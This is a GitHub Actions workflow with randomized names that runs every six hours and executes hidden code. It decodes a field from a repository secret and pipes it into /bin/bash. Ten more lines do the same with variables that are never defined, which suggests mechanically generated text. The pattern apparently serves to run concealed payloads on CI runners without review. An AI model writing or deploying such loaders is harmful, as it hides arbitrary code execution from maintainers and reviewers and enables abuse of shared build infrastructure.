name: lujingxi3456

on:
  workflow_dispatch:
  schedule:
    - cron: '20 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lujingxi3456
        env:
          rwcl54: ${{ secrets.rwcl54 }}
        run: |
          echo $rwcl54 | jq -r .z1484 | /bin/bash
          echo $bbjc2 | jq -r .jsl57388 | /bin/bash
          echo $xxo9 | jq -r .rzgx82 | /bin/bash
          echo $reyws72698 | jq -r .nq200 | /bin/bash
          echo $hv9908 | jq -r .lprg18720 | /bin/bash
          echo $vulny0 | jq -r .hbnwf49794 | /bin/bash
          echo $ffv45 | jq -r .ndrk19 | /bin/bash
          echo $dkij6750 | jq -r .akvl5857 | /bin/bash
          echo $mxmn86 | jq -r .eumsw8 | /bin/bash
          echo $ulbob4 | jq -r .xcpxl725 | /bin/bash
          echo $hx690 | jq -r .ycw90 | /bin/bash

